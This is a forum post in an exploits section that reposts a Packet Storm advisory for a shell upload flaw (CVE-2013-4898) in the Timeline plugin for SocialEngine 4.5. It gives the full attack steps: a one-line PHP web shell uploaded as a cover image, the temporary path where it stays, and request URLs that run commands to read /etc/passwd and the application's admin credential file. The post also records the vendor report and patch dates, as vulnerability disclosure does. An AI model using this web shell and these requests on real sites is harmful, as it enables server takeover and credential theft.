Jump to content
Matt

SocialEngine 4.5 Shell Upload

By Matt, in Exploituri

Recommended Posts

Matt Newbie

Matt

Posted
Posted

Description : SocialEngine version 4.5 suffers from a remote shell upload vulnerability.

Author : Wesley Henrique Leite

Source : SocialEngine 4.5 Shell Upload ? Packet Storm

Code : 

+ INTRODUCTION
-------------------------------------------------------------
The plugin has the objective give you a better visual for the user
profile, allowed the addition of cover image keeping the layout closest
to the style of modern social networks, among other features.


+ DESCRIPTION OF VULNERABILITY
-------------------------------------------------------------
Logged into the system, enter on profile page of your user. [my profile]

    http://example.com/index.php/profile/[profile-name]

    >> Click "Change Cover"

    >> Click "Upload Cover"

select the file "*.php" you want to send.

//### Example PHP file to send "inject.php" ###
    <?php echo system("$_GET['cmd']"); ?>
//###

After selecting the file upload, this will be sent to an area temporarily,
the system detects that the format is not valid, but doesn’t remove,
allowing access later.

an error message is displayed on the screen.

[ File "/srv/www/htdocs/example.com/public/temporary/timeline/cover_original_8.php"
is not an image or does not exist ]


+ ACCESS
-------------------------------------------------------------
    /srv/www/htdocs/example.com/public/temporary/timeline/cover_original_8.php

The important thing is the structure of public forward, it will give
us access to our archive.

    account operation system
    http://example.com/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd

    account credentials admin application
    http://example.com/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php

-------------------------------------------------------------
+ Discovered by: Wesley Henrique Leite ( wesleyhenrique (´) gmail (´) com )
+ Software: SocialEngine 4.5
+ Plugin Link: http://webhive.com.ua/store/product.php?id_product=46
+ Plugin Name+Version :  Timeline 4.2.5p9
+ CVE-2013-4898
+ REPORTED TO VENDOR JUL 17 2013
+ PATCH RELEASED            JUL 25 2013
-------------------------------------------------------------

-- 
Wesley Henrique Leite

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...